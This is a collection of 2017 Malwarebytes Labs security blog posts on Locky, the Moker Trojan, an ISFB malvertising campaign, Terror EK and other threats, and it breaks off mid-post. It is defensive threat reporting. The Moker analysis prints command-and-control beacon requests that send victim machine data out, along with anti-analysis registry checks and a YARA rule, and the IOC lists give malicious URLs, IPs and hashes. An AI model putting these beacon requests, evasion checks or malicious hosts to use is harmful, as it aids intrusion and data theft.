Techie Feeds

Locky ransomware is back, but we already protect against it

Malwarebytes - Fri, 04/21/2017 - 23:38

In our Q1 2017 Tactics and Techniques report, we mentioned that the Locky ransomware had mysteriously vanished. Indeed, for a while, it completely disappeared and allowed for Cerber to take the number one spot as the most distributed piece of ransomware (and malware for that matter).

However, the group controlling the Necurs botnet has just opened the spam floodgates again and is pumping out fake documents that deliver the nasty Locky ransomware right before going into the weekend.

PDF to Word Macro

The ransomware is dropped following a distribution method we have been seeing more of recently with Dridex which involves embedding a Word document within a PDF file.

While this may seem like an unnecessary extra step, it actually allows to bypass sandboxes. Once the user clicks the OK button, the rogue Word document is displayed:

This last step requires a bit of social engineering to execute a malicious macro that will download the actual Locky ransomware.

Personal files are encrypted with the .osiris extension and the crooks are asking 0.5 Bitcoin ($623 at the time of writing) to recover them.

Protection

The attack relies on users opening up malicious attachments that will appear legitimate. Many studies have shown that users are often the weakest link in an attack chain and criminals know that too well.

Malwarebytes protects against this attack at various layers including macro and ransomware mitigation, and neither of those required any signature update.

The post Locky ransomware is back, but we already protect against it appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Elusive Moker Trojan is back

Malwarebytes - Fri, 04/21/2017 - 18:44

Some time ago we observed a rare, interesting malware dropped from the Rig-v EK. Its code was depicting that it is written by professionals. Research has shown that it is a sample of Moker Trojan that was discovered in 2015 (read more here). However, for a long time, we could not find a sample with working CnC in order to do a deeper research. Finally, we found such a sample – this article will be a deep dive in its capabilities.

Analyzed samples

Downloaded modules:

8997b9365c697e757f5a4717ec36fb2dpluginj382dew1i.exe

faf2135dc5311b034d31191694a52bbdKB1080030.exe

Reference samples (from 2015)

Distribution method

We found Moker Trojan distributed via exploit kits – in malvertising campaigns, as well as dropped from the hacked sites. Example – Rig-v EK dropping Moker:

Behavioral analysis

The malware injects itself into the svchost, and then contacts the CnC server.

Network communication

The communication is encrypted. The typical way of beaconing is to send the request to the address: <gate_name>.php?img=<number>
An example of the sent request:

GET /nnnn04722.php?img=1 HTTP/1.1 User-Agent: Mozilla Host: bitmixc.ml

The server responds with encrypted content (the bot saves it in a registry key). Then it injects itself in other applications and sends further requests, including the data of the infected machine, i.e.:

GET /nnnn04722.php?page=<computername><windows_version>_<disk_id>&s=<number>p=<number>.<number>&err=<number>.<number>

In the below case, the response turned out to be a PE file (an updated version of the bot) obfuscated by XOR with a character ‘c’.

The server responds either by sending some encrypted content or a number:

=<number>

Persistence

Moker achieves its persistence by adding a Run key in the registry. This method may look very simple at first. However, the authors of the malware hid the real executable behind a legitimate Microsoft application – Rundl32.exe. Thanks to this trick, it is much harder to notice it – a popular tool used to examine persistent applications, Sysinternals’ autoruns, does not show such keys by default, assuming that they are harmless. (Viewing them can be enabled by clearing the default option “Hide Windows Entries”.)

The sample of Moker is dropped in the current user’s home directory:

If we take a closer look at the sample, we can see that it has been slightly modified in comparison to the original one – some encrypted information has been removed:

As it turned out after the further research (see in the part “Inside”), those bytes contains the CnC address, prefixed by a special tag. The information removed from the executable is not lost but stored elsewhere – in one of the registry keys created for storing the malware configuration.

Other keys created by the malware are saved under “..\CLSID\{448D3B34-8D3B-3B34-8D3B-48D3448D3B34}”:

The full dump of the registry entries is available here.

As it turned out, the encrypted CnC address, that was removed from the executable, is persisted in  the registry, inside the key “5”:

Compare with the data from inside the original sample:

Another key, “6”, stores a PE file (the executable dumped from the registry is available here: 91f754c3fc475aed93e80575bb503c73).

The key “7” stores the data that was downloaded from the CnC after the initial beacon:

Compare with the content of the server response:

The key “10” contains the name of the downloaded module:

The new module is stored in ProgramData:

Its persistence is added also with the help of a Run key (in a similar way as the previously described case):

Inside

Moker consists of two main modules. The Stage 1, that is a downloader, and the Stage 2, that is a DLL containing the core malicious features. The downloader injects itself, along with the unpacked shellcode, into the svchost.exe. The screenshot below shows an example of the infected memory pages inside the svchost.exe:

The injected shellcode is responsible for sending the initial beacon to the CnC. Then, if the CnC is active, the main DLL is downloaded and injected into the other processes. During the tests, all 32-bit applications running in the Medium integrity mode have been infected by the Moker DLL.

Stage 1

Let’s dive in the code, starting from the dropper – that is the Stage 1. This is the binary used for initiating the full infection process – originally delivered by exploit kits. Every sample comes packed by some crypter (crypters are different for various samples so we will not describe this layer here).

After defeating a stub of a crypter, we get another PE file – with a layout typical for Moker. The section .text, that – in normal cases is the first section of PE, in case of Moker comes as second:

Section .data is very small in the raw file, but it is expanding in the virtual image. So, we can suspect that something more is unpacked there:

Obfuscated execution flow

The internal structure of this module is very interesting. It has self-modifying code with execution based on VEH (Vectored Exception Handers). Execution starts from installing the handler:

Instructions IN are used in various places in the code. Their role is to disrupt the continuity of the execution by triggering an exception. Then, execution is redirected to the previously installed handler. Depending on the variant of the instruction that triggered the exception, the context is changed in one of the few ways:

Context patching is used to obfuscate the execution flow. Thanks to this trick, static analysis of the code is almost impossible – all changes on the fly.

The JMP EAX (first case in the exception handler) is used to deploy API calls. It is triggered by IN AL, <BYTE> (see the example below):

That’s why, if we trace the API calls made by the application, we can notice that most of them are made from the same address in the code – only the target address is changing.

Not only the execution flow but also the code itself is dynamically modified. We can find the application calling very often VirtualAlloc:

Some pieces of the encrypted code are copied from the main executable into this dynamically allocated memory:

Then, they are decrypted by a dedicated function:

The revealed code is almost ready – except for the addresses of calls, that needs to be filled. You can see in the following fragment, that temporarily the CALL points to its own address:

This is fixed in another step – the decoding function returns into another code fragment, that modifies the addresses:

Till the new piece of code is fully revealed and ready to be called (see the fixed CALL target):

When the modifying function returns, execution falls into the line that performs a jump into the new code:

The revealed code makes another layer – again allocating, decrypting and calling code.

The code chunks that provide some real functionality are always deployed via this type of proxy – that makes execution flow more complicated.

Functionality

The dropper starts execution from the defensive checks, ensuring that it is not run in the controlled environment. The following registry keys are searched:

"HKEY_LOCAL_MACHINE\\HARDWARE\\ACPI\\DSDT\\VBOX__" "HKEY_CURRENT_USER\\Software\\Trusteer\\Rapport" "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" -> SysAnalyzer

If all the checks passed, the application reads it’s own file from the disk and searches there for some typical markers. An example of the search:

The important thing is, those markers are present in the outermost layer – the original PE file (not the unpacked one). Thanks to this feature, knowing them allowed to create a very simple YARA rule to identify Moker:

rule MokerTrojan { strings: $key = {3D FF 24 8B 92 C1 D6 9D} condition: IsPE and all of them }

The mentioned markers are used as indicators, after which the encrypted CnC address is stored.

Another feature, typical for Moker is mutex in the following format:

"Global\\a0bp-<Machine_ID>"

The mutex prevents the application from being run more than once.

After the environment checks are passed, Moker unpacks the shellcode, that has capabilities of a downloader, and injects it (along with the initial PE file) into svchost.

Stage 2

If the main DLL was successfully downloaded by the Stage 1, it is being further injected in the applications. Example – Moker DLL injected into jusched (Java Update Scheduler):

This module is responsible for all the malicious actions performed by the malware – also, it actively communicates with its CnC. Below you can see a sample POST request sent from inside the injected DLL:

If we try to dump the injected DLL, we can see, that it’s imported table has been destroyed – all the names of the DLLs and imported functions are erased. However, using a dedicated tool I was able to recover it (see more here).

The DLL provides various features typical for RAT (they didn’t chang from the latest analysis in 2015, provided here).

Code of the core DLL is written in a decent way, suggesting professionalism of the authors. However in contrary to the dropper, the obfuscation used here is rather simple. Most of the strings and API calls are not obfuscated, or obfuscated in a trivial way.

Looking inside the code, we can see references to the registry keys, observed during behavioral analysis, i.e.:

The DLL communicates not only with the CnC, but also with it’s other injected modules, using local sockets and named pipes. An example below – starting a local socket for listening:

The commands read from the ipe are parsed and executed:

Basing on the command id, malware can be requested over pipe to execute some command or to create and save a screenshot:

Among the interesting features of this part is, it also provides access to it’s features via simple GUI. It may be used for local tests, or. in case if the attackers prefer to access the victim machine via Remote Desktop.

CnC servers

List of the found CnC servers (one address per one sample):

http://bitmixc.ml/nnnn04722.php http://bitmixc.ml/msnwiwoq25.php http://matthi.tk/abb6a388.php http://sally33.cf/23mmmdw3.php http://siri5.ml/www9.php Conclusion

Moker is a rare malware, but written by very skilled authors. Compilation timestamp of the core module is 2015-05-03 00:40:11. This suggests that since its moment of appearance, still the same samples are in circulation, only they are repacked by different packers. This fact leads us to the conclusion that the tool have been produced and sold on black market in 2015, after that possibly abandoned by the original developers.

Appendix

http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network – Ensilo on Moker (from 2015)

https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/ – part 1

https://breakingmalware.com/malware/moker-part-2-capabilities/ –  part 2

This was a guest post written by Hasherezade, an independent researcher and programmer with a strong interest in InfoSec. She loves going in details about malware and sharing threat information with the community. Check her out on Twitter @hasherezade and her personal blog: https://hshrzd.wordpress.com.

 

The post Elusive Moker Trojan is back appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Binary Options malvertising campaign drops ISFB banking Trojan

Malwarebytes - Thu, 04/20/2017 - 15:00

We have been witnessing a series of malvertising attacks that keep a low profile with decoy websites and strong IP address filtering. We are calling it the ‘Binary Options’ campaign because the threat actor is using the front of a trading company to hide the real nature of his business.

There have been similar uses of fake façades as a gateway to exploit kits. For instance, Magnitude EK is known to use gates that have to do with Bitcoin, investment websites and such, as detailed in this Proofpoint blog entry.

In this particular case, the threat actor stole the web template from “Capital World Option“, a company that provides a platform for trading binary options. Participants must predict whether the price of an asset will rise or fall within a given time frame, which defines whether or not they will make money. Binary options have earned a bad reputation though and some countries have even banned them.

Fraudulent infrastructure

Below is a screenshot of the legitimate website that is being impersonated. There are some differences between the real one and the fakes; the former is using SSL and was registered a while ago. Also, some of the website functionality is not working properly with the decoy versions.

Legitimate site:

Decoy site that ripped all the branding:

Those fake sites are only meant to be viewed if you are not a target of this particular malware campaign. In other words, if you load the infection chain from the malvertising call and see the site, you will not be infected. Infections happen when the fraudulent server forwards victims directly to a second gate, without showing them any of the site’s content.

The same threat actor has registered many different domains all purporting to be lookalikes using a similar naming convention. The recent creation dates for these decoy sites is a hint that they are not likely to be legitimate:

Domain Name: CAPITALWORLDOPTION.COM Creation Date: 2017-04-04T09:15:14Z Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com Registrant Email: detes55@mail.ru

Malvertising chain

The attack starts off with an ad call from one of a few ad networks (Popads, PlugRush were detected in our telemetry) and redirects users to the decoy website where a quick IP check is performed.

Only legitimate users will be redirected to the second stage server, which also performs its own check. Once again, unwanted traffic will be dumped (and a message – perhaps from the threat actor? – “No time for rent” passed in the URL):

Otherwise, users that have made it past those two gates will be presented with the RIG exploit kit.

Banking Trojan

The final payload consistently distributed via this campaign (across different geolocations) appears to be an ISFB variant (AKA Dreambot, Gozi, Usrnif), based off an old but resilient banking Trojan. Some of its features include web injects for the victims’ browsers, screenshoting, video recording, transparent redirections, etc.

The artifacts left on the system were very similar to those described in a Proofpoint blog about Dreambot and the samples we collected also download a Tor client. The registry entry for the Tor client can be seen below:

Modular structure

The sample retrieves several modules once it sets hold onto a victim machine and below is an overview:

Original Dropper

-> loader.dll injected into svchost.exe

-> client.dll and tordll.dll downloaded and injected into explorer.exe and into browsers

The main executable injects a file (loader.dll) into svchost.exe in order to download other modules which are encrypted during transport (tor.dll and client.dll) both available in 32 and 64 bits:

We can notice the “ISFB” signature within the malware code:

This piece of malware has some anti-VM features, for example, it checks on the mouse cursor:

Modules are injected into explorer.exe and try to establish a connection to an .onion address. Browsers are also injected, via client.dll as depicted below with Mozilla Firefox:

There are scores of hosts that are contacted post infection, as well as the Tor connections that trigger many ET rules as ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group.

Conclusion

This particular campaign focused on a very specific malvertising chain leading to the RIG exploit kit and – as far as we could tell – dropping the same payload each time, no matter the geolocation of the victim.

Banking Trojans have been a little bit forgotten about these days as they are overshadowed by ransomware. However, they still represent a significant threat and actually do operate safely in the shadows, manipulating banking portals to perform wire transfers unbeknownst to their victims or even the banks they are targeting.

Malwarebytes users are protected against this threat at various levels: domain and IP blocks, exploit mitigation for RIG EK, and detection of the malware payloads.

Related material IOCs

‘Binary Options’ domains:

all-binarys-option.com all-binarys-options.com binaryoptionleader.com binaryoptionleaders.com binarysfinanceoptions.com binarysoption.com binarys-option.com binarysoptionleader.com binarysoptionleaders.com binarysoptions.com binarys-options.com binarysoptionsfinance.com binarysoptionsleader.com binarysoptionsleaders.com capitalworldoption.com financebinarysoptions.com financeoptionbinarys.com financeoptionsbinarys.com financesoptionbinary.com financesoptionbinarys.com financesoptionsbinary.com financesoptionsbinarys.com opteckoption.com

‘Binary options’ IP addresses:

217.23.1.65 217.23.1.66 217.23.1.67 217.23.1.104 217.23.1.130 217.23.1.187 217.23.1.200

Redirects:

basefont.ul-8.moskvi.ru/user5.php p.figcaption-7.nfl.si/user5.php command.bdo-3.mirifictour.ro/user5.php menu.command-2.moskvi.ru/user5.php code.a-10.moskvi.ru/user5.php header.h5-2.mirifictour.ro/user5.php input.noframes-8.narovlya.ru/user5.php col.output-9.nfl.si/user5.php meter.em-8.narovlya.ru/user5.php applet.x-3.nomundodapaula.com.br/user5.php

Payloads from different geos (ISFB):

f2f8843673000b082ad08bd555c8cd023918a3c11af9d74e9fa98f3b1304b6be f12bc471f040146318a6fbd2879a95d947d494bd0b869dc95c01cfc22af0ab13 61dd7aa2ca44371b7c8cd4dc9e5f3bd05a8c6213d8e6357dfdb9034b1c0fd590 aed39345668d24dced4b83c36321e98ec9f09af3044b94ceecf01662de0189ab

Post infection traffic:

158.69.176.173/images/zln7qsefZ961EfLVkD3/0FmzZhicPZalFMUtdp9E0C/JxRcPKmDA9QAA/dNCE_2Bz/nFe1Bp_2FQNkn0aOHQCqpjG/33nc7lV8N1/jqOZO3jD875TzqQe2/H4W4lqjSRyxC/y8DoNHjxcTr/G95nFCsQ3Okctfp6/BiJ/.avi 158.69.176.173/images/KziuBbVMi/s2WSfAlAnamELXfRux7g/hq2LcDlwVjaxz0wE5od/9arE_2F5SMgQT998TrddNM/4d_2BLLUe0pfm/epm_2Fgg/3RjjJAXl_2BNDeRmGWmDepV/uMhwCLFDJQ/gkVfwnDYZJfM9VuaZ/J0K10GnIYbAf/EFUtmfqTfj0/I2i5fuZ6/1Rys9uq/.avi 158.69.176.173/images/xeF9Qj1PPNbvhLGetscM/N_2FnVKgMXfiY05zWnD/WL5p5iqJTPu43MoqB_2FZ8/y_2BMpwWHCygC/iIfdEdE4/zCDZ_2FYukajKGJu2XwR_2F/5gPQp0gmRe/6Nms6WfWADsw0I92V/k_2FmprVONWQ/1YP45RKaYhQ/ZOFhK6V/.avi 158.69.176.173/images/smmqGoxf/caltlwZ4eJEFQRiF13_2FDr/jb3Lhoj5l3/3C3I8HbwUcIkIKNfL/GIUnsu0NJ4bJ/ZXPEqKW98uh/zBpYxDhxeVIPy6/cYD1wzpUZwSX4VlTDrU_2/Be4T8_2BuFE_2BWW/MED1GtDjNb13kH2/L77gQOYerQ/4/.avi 158.69.176.173/tor/t64.dll ip-addr.es/ aeeeeeeeeeeeeeeeeeeeeeeeeeeeva.onion/images/skmTPhNwp9NVU/_2F4G_2B/uO_2FVNwGzKHjF6XXm_2FwR/ozV3WtHKFN/qHCZk_2F3zfY5Tun4/1_2BY1OBwXA5/h78wUMDgWOn/Oa3902QJKJepaG/gUyn6OwepJp_2FOUDt5DR/ghzi_2F0if2w_2F_/2FdLkzlJyrJBEYQ/JpqpaM_2Fe9ZGGJ0sH/0PPW00gpm/fw759RTtukH4CWzHzdgY/YeqpElX.jpeg aeeeeeeeeeeeeeeeeeeeeeeeeeeeva.onion/images/mUKxVkxTd4/jVGmdXz5wgukSnoqn/dHI0tQ0GMoHy/t33eKJEj_2B/eJhlUIVkjtD0_2/FQQ_2BYinpCl5HhsfJrU4/yvNBC3qaWv_2FVe4/E_2Fx7bI21jWxgd/zVb0J5JvNu2Lw16DFS/54MHtYxkR/SAahGsIeNYj7btD7lEtU/WXJ_2FZExsnS_2FrMYl/_2FpoHgPSdiun20G8AgOLX/G1pu.gif

The post Binary Options malvertising campaign drops ISFB banking Trojan appeared first on Malwarebytes Labs.

Categories: Techie Feeds

ShadowBrokers releases more stolen information

Malwarebytes - Fri, 04/14/2017 - 18:03

ShadowBrokers shocked the security world again today by releasing another cache of exploits, files, and operational documents purportedly stolen from Equation Group last summer.  As you may recall from our earlier publications, Equation Group is reportedly a clandestine hacking group that has been linked with NSA hacking tools.

The dump of information released today contains a number of exploits and Windows binary files that were not seen with the previous collection of information.  While the ‘Auction’ file may have contained obsolete exploits and information, this new release appears to contain much more recent and current data including 0-Day exploits.  While we haven’t had time to fully review the information, Twitter user HackerFantastic has already reported a successful 0-day exploit on Windows 2008 Server.

HackerFantastic showing exploit against Windows 2008

 

NSA-FTS327 USA USA strings located

One bit of information we have already uncovered are ‘Author’ tags located on some of the document files.  These tags contain reference to a string: NSA-FTS327.This string appears in a number of NSA Organizational documents and appears to be related to the Requirements and Targeting office.  The Snowden Surveillance Archive identifies the Requirements and Targeting office designation as FTS327, and provides a document authored by NSA’s Texas TAO, Requirements and Targeting office suggesting that Computer Network exploitation was used to exploit a weakness in Mexican President Felipe Calderon’s public email.  The program used the code name of ‘FlatLiquid’.  While no mention of that particular string has been in this dump, if the Author string found on the documents is accurate, then that would suggest there may be validity in the claims that these are NSA tools.

 

Screenshot of Snowden Surveillance Archive showing the FTS327 designation.

There is lots of information to sift through in this dump before researchers have an idea to the scope of the release, and it may take several days for a full analysis of the information has been completed.  If there are active 0-Days, we will see software manufactures scramble to release timely patches to help thwart almost certain use of this code by malicious actors in the ‘residential’ business of malware infection – as we saw with Microsoft earlier this week in regards to the Office 0-Day that was circulating via spam.

We are currently analyzing the roughly 1000 Windows binaries that were included, and if necessary, will be pushing any needed updated before I even finish proofing this blog entry.

The post ShadowBrokers releases more stolen information appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Amazon third party sellers: A new threat

Malwarebytes - Fri, 04/14/2017 - 15:00

On Monday, the Wall Street Journal reported a wave of hijacked Amazon seller accounts that proceeded to fleece buyers for large sums of money. As reported here, attackers would use credentials harvested from other breaches to take over the account, then either simply redirect funds to their own deposit account or create lots of fake “sales” to collect money from buyers, but never deliver goods. Pretty good scam, right? So how do we defend against it?

First, we’ve talked about credential dumps before and why they’re a security risk. In brief, a breach on a third party site that isn’t all that important to you can yield credentials that can be reused on sites that are much more important. (Please do not reuse passwords.) While you can’t control how a third party chooses to protect your password, you can implement control measures on your end like Two Factor Authentication. While Amazon doesn’t appear to have documentation on how to do this for a seller account, their support forum makes reference to its recent release as a feature here. The thread also has some great advice for sellers who suspect their account has been breached:

That’s all well and good for sellers, but how do you protect yourself from a bogus third party seller? First, do not rely on feedback alone. Sellers can easily purchase bots to generate positive feedback for themselves in bulk. Further, Amazon seller fraud generally runs on a cycle of several weeks. The fake seller will collect orders within that timeframe, then at the threshold where a defrauded buyer is able to tell Amazon “Hey I never received the item,” they’ll take their money and close the account. If they’re able to do this before attracting significant scrutiny, a new account can be opened and the process can start again. A simple way to not get caught by this sort of scam is:

Don’t use third party sellers

Simple, but not easy. Let’s say you’re a vintage electronics collector and you want to buy this sweet click wheel iPod.

It says Apple right there in the header, so it must be a refurbished product, right? But, if you look further down you’ll see a very optimistic sales price and

Fulfilled by Amazon. Which means…

So while Amazon will ship that snazzy iPod to you, they can’t tell you how reliable the seller is, if the iPod actually is an iPod, or something closer to a P-P-P-Powerbook. What you really want is “Ships from and Sold By Amazon,” as seen here:

Buying only “Ships from and sold by,” can be harder than it looks. Sales analysis here shows that third party sellers make up a significant portion of Amazon’s profits and are projected to increase sharply over the near term. According to CNBC, roughly 40% of Amazon’s unit sales come from third parties and the number can be higher for certain types of products. While it is increasingly frustrating to avoid bogus sellers, the company does provide extensive support after the fact and will guarantee that purchases are delivered and are as advertised.

Amazon third party sellers have consistently had issues with fraud and counterfeit goods. Now we can add a new threat to the pile of attacks against sellers themselves. Keep yourself safe by using a quality password with two-factor authentication enabled and try to stick with the seller you know, rather than someone offering a price that might be a little too good.

The post Amazon third party sellers: A new threat appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Report: Cybercrime climate shifts dramatically in first quarter

Malwarebytes - Thu, 04/13/2017 - 09:00

The first quarter of 2017 brought with it some significant changes to the threat landscape and we aren’t talking about heavy ransomware distribution either. Threats which were previously believed to be serious contenders this year have nearly vanished entirely, while new threats and infection techniques have forced the security community to reconsider collection and analysis efforts.

In our second Cybercrime Tactics & Techniques report (read the first one here), we are going to take a deep look at what threats got our attention the most during the first three months of the year, what we expect to happen moving through the next quarter and a behind the scenes interview with one of our Malwarebytes Labs analysts. Here is a sneak peek at what we are going to cover:

  • Cerber ransomware took over as the top dog as far as distribution and market share.
  • Locky ransomware has dropped off the map, likely due to the desired change by the controllers of the Necurs spam botnet; however, with a lack of new Locky versions being developed since before the beginning of the year, the fate of its creators are unknown.
  • The Mac threat landscape saw a surge of new malware and backdoors in Q1 2017, including a new Mac ransomware (FindZip).
  • On the Android side, two notable malware families have been causing a lot of trouble. HiddenAds.lck, which locks the device from being able to remove the app, therefore allowing for more advertisement revenue for the creators, and Jisut, a mobile ransomware family that has been spreading like wildfire.
  • In the exploit kit world, RIG continues to have the greatest market share of the few exploit kits that are still active and we expect this to continue. RIG exploit kit remains on top mainly due to its lack of competition rather than its technical sophistication.
  • Malicious spam campaigns have also started utilizing password protected zipped files and protected Office documents to evade auto analysis sandboxes utilized by security researchers.
  • In social media scams, users were bombarded with links to WWE nude photo dumps that lead to gift card survey scams.
  • Tech support scammers, finding difficulty working with North American payment processors, have begun accepting alternate forms of payment, such as Apple gift cards and bitcoin.

Looking ahead to the second quarter of the year:

  • We expect to see continued heavy distribution of Cerber through Q2 2017 due to new developments made to the malware design and its continued use of the ransomware as a service (RaaS) model.
  • As far as Cerber losing its crown, it is unlikely within the next quarter that any competitor will rise in market share enough to dethrone Cerber, barring something happening to the developers of Cerber and their ability to develop and distribute the ransomware.
  • The continued heavy development of Mac malware throughout Q2 is highly likely.
  • The Android ransomware Jisut is expected to continue its trend of high distribution and spread. We predict the same for HiddenAds.lck.
  • Distribution mechanisms are likely going to develop new features and functionality, be it through social engineering tactics utilized by exploit kits and malicious spam or from the discovery of new exploits, potentially revitalizing the exploit kit market.
  • Finally, in the world of scams, we expect to see an uptick of ‘exit scams’ and tech support scammers utilizing social media advertising to scam each other. At the same time, we predict the increase collaboration of PUPs and TSS through the spread of tech support scammer advertisements being pushed alongside potentially unwanted programs.
Download full report here

 

Thanks for reading and safe surfing!

The post Report: Cybercrime climate shifts dramatically in first quarter appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What is a Zero-Day?

Malwarebytes - Wed, 04/12/2017 - 15:00

You have probably heard the term zero-day or zero-hour malware, but what exactly does it mean?

It’s simple: it just means the malware is using a software vulnerability for which there is currently no available defense or fix. The vulnerability allows the malware to perform actions on your system that should not be permitted, such as running arbitrary code. Such malicious actions can impact the confidentiality, integrity, or availability of your system.

If a vulnerability is known already (i.e. not a zero-day), then chances are the software vendor has patched it, and/or security software vendors have added defenses against it. So you can protect yourself against known vulnerabilities simply by keeping your software, including your anti-malware defense, up to date. But these precautions will not protect you against zero-days.

You can think of the search for new vulnerabilities as a race. When security researchers and good guys find them, they warn the software vendor so the vulnerability can be patched. The best practice (what’s called “responsible disclosure“) is to initially do this privately, so the bad guys won’t get a head’s up. Once some time has passed, allowing the vulnerability to be patched, the finding is made public. At this time, it might get a CVE number from the Mitre Corporation so that any interested party may refer to the vulnerability using a standard name.

Unfortunately, the bad guys are also in this race. They look for vulnerabilities in order to accomplish their ends, which generally involve ripping you off in some way. They try to find undisclosed vulnerabilities and create malware that takes advantage of them.

So are we defenseless against zero-day attacks? Happily, the answer is no. Anti-Exploit software like Malwarebytes Anti-Exploit can monitor your system for the sorts of actions associated with zero-day exploits and shut them down before they harm your system. If you’d like to learn more about the technical details, you may read about them in this blog post about how Malwarebytes Anti-Exploit works.

The post What is a Zero-Day? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Sundown EK gone missing, Terror EK flavours seen in active drive-by campaigns

Malwarebytes - Tue, 04/11/2017 - 21:12

Many security researchers tracking exploit kits have noted the lack of Sundown EK activity for several weeks now. A post from Cisco’s Talos team came off as a bit of a surprise at the end of March (Threat Spotlight: Sundown Matures), but any doubts were squashed by this tweet on April 8th (Sundown (Beps) and Nebula out ? More than one month since last hits).

Also, whatever happened to Bizarro and Greenflash Sundown EKs? Whether this is a temporary break or yet another dead EK, time will tell.

In the meantime, there has been much noise and some activity from an exploit kit that appeared late last year and which we wrote about in early January. Because of similarities with Sundown EK, we initially thought that it was simply a new variant but it was actually from a different actor and called Terror EK by Spider Labs.

In this post Angler era, we have been accustomed to one hit wonders or bogus kits stolen and repackaged for sale under a different name. Simon Kenin over at Trustwave tracked and exposed the activities of  the author of the Terror EK, going by the handle @666_KingCobra, in various underground forums. To make matters more complicated, there is a thing right now with rebranding and Terror EK has been known to be called Blaze, Neptune, or even Eris.

With all this noise, it’s usually a good idea to look at what is actively being seen in the wild versus what may be advertised here and there. Once we see an exploit kit in various distribution campaigns we know it is at least worth looking at.

Malvertising campaigns

We have been monitoring this particular campaign for some time and this is the instance of Terror EK most known about. Various ad networks (low quality traffic) are pushing this at the moment.

Main landing page:

IE exploits:

Call to Flash exploits:

Call to Silverlight exploit:

Malware payload: Smoke Loader

Compromised sites campaign

This is a newer campaign we started to notice just a few days ago with the landing and payloads slightly different.

Redirection to EK:

The compromised websites are leveraged to redirect to the exploit kit landing page in two different ways (but both are implemented). The first is the server 302 redirect call:

But there is also another one done via script injection:

We see both of them in use, but each pushes their own flavour of Terror EK (classic one shown above via malvertising or the newer one). For example, the redir via script injection loads uploadrobot.download which in turn calls the ‘classic’ Terror landing:

Landing page:

This one stuffs everything into the landing page (rather than via multiple sessions). No lorem ipsum here, but some pretty lengthy text which precedes the various calls for exploits.

IE exploits:

Flash exploits:

Payload deployment (remember ‘Sub fire()‘?)

Malware payload: Andromeda

More copycats on the horizon

Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here.

If it weren’t for active distribution campaigns, there would be very little to write about those numerous variants until they brought in something more serious to the table.

Malwarebytes users are protected against this exploit kit and its payloads.

IOCs:

Gates:

http://sweetwine.club http://uploadrobot.download/frame.php

Classic Terror EK patterns:

http://46.101.101.142/e71cac9dd645d92189c49e2b30ec627a/5f9987ccc0625389623525a46116f048 http://46.101.101.142/5f9987ccc0625389623525a46116f048/795819/58e9d4f033acc http://46.101.101.142/5f9987ccc0625389623525a46116f048/a39401275d1b300aa789fb22aea4148a http://46.101.101.142/5f9987ccc0625389623525a46116f048/9526e055c9757becf45c5190facfd9f2 http://46.101.101.142/5f9987ccc0625389623525a46116f048/oiuhygnjda.swf http://46.101.101.142/5f9987ccc0625389623525a46116f048/uploads/wdioj124.swf http://159.203.185.4/uploads/SilverApp1.xap http://46.101.101.142/d/5f9987ccc0625389623525a46116f048/?q=r4&r=28bac89052d8b2cb744a71a57b824a84&e=cve20146332

New Terror EK patterns:

http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/1nMSGFjFkw5a.php http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/ovRHl8aX9cp4/NyhUcUzgwLZe.swf http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/Zgtb0yL6c0qS/vACS5uJmHoxe.swf http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/Si7RBmLPbtk3/EZZ0lzVwV8ds.swf http://46.166.185.57/9bfJS8fGH3ajrwj5oLPi3ml8/Gopu04Ttg5s1.php

Flash exploits:

7c9c76fbf156fbc5bffbfce1033d06a35b64cee49c01b09df47fa2642ad1a0b6 890f8756e6ab3bd62a2c3fbd098471e17db56808b19018119c0ad4a26ed7060f 97f107853c99b0de95a3e5b84ad1435e31cb42bd05d495d585e18f81a59a362d

Andromeda:

6b40885fefbce6b1422f568a966c63e2468408f8f979746617c115070fbdd3fe

Smoke Loader:

537ea229cc0d4b65e27ae59286a712a1a8f0f5630b2a945c71d86f6c5dbed848

The post Sundown EK gone missing, Terror EK flavours seen in active drive-by campaigns appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mastodon: different social network, additional risks

Malwarebytes - Tue, 04/11/2017 - 15:00

Mastodon is a social network that’s a few months old and it’s been mentioned on news sites quite a lot recently, leading users to sign up to an instance and check it out.

I have noticed that some of the new people seem to be treating it like any other social network and not realizing that its differences can open up some opportunities that less scrupulous individuals could take advantage of if these new users aren’t aware of the risks.

Mastodon’s decentralization is its key selling point: no one person “owns” the entire network. Anyone can set up a Mastodon server (“instance” in the community parlance) that can communicate with anyone over the entire network. (There are differences: some instances can choose to only allow contact with certain other instances or even no other instances.) In some ways, this is a good thing: the main benefit cited has been a lack of advertising directly from the social network itself, which removes certain threats that have been seen on other social networks – for example, phishing on Twitter via sponsored posts, or malvertising on Facebook leading to tech support scams.

 

Usernames aren’t unique

However, usernames on Mastodon are not unique across the entire network; only per instance. If you registered as @somerandomuser on the mastodon.social instance, your full Mastodon username would be @somerandomuser@mastodon.social; some other person could register as @somerandomuser on the mastodon.xyz instance, and therefore be @somerandomuser@mastodon.xyz. Users are, quite naturally, describing this situation using a comparison with email addresses.

As phishing exists via email, similar attacks could occur on Mastodon, with a malicious user registering on a Mastodon instance with the username of someone on another instance, cloning their profile, and trying to social engineer their followers, for example. Those on another instance will see the full Mastodon username with the instance name, but this can be cut off with usernames that are long enough, on some clients (like the web one). For an example, see the screenshot below, where @munin@mastodon.hasameli.com‘s username is not visible:

There is a way to show the full URL to the user’s profile including their instance: hover over their display name or profile picture – both are links to the profile of a user. Of course, a malicious user could set up an instance of their own with a domain name very similar to an existing instance, so be sure to double check the URL.

 

No verified accounts

